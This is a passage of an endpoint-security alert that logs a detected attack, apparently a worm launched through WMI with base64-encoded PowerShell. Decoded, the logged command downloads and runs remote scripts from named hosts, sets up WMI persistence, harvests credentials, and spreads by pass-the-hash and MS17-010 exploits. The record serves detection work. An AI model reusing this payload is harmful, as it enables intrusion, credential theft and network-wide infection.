AAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA=="],"cmd_line":"powershell.exe -NoP -NonI -W Hidden -E JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA==","parent_app":"WmiPrvSE.exe","parent_app_path":"C:\\Windows\\System32\\wbem","parent_pid":2236,"parent_puid":132461352663910600,"parent_user":"SYSTEM","parent_user_sid":"010100000000000512000000","pid":10724,"puid":132465072105597400,"ts":1602033881727175700,"user":"user@testdomain.com","user_sid":"010100000000000512000000"}}],"limited":false,"matched":1},"schema":"endpoint","schema_epoch":2,"sig_id":20190517123456,"sig_rev":5},"detection":"apde:20190517123456","end_ts":1610640884,"engine":"apde","id":"d2616Ab846","name":"WMIPRVSE Launched Encoded Powershell Command","observables":{"file":[{"md5":"a575a7610e5f003cc36df39e07c4ba7d","name":"powershell.exe","path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating 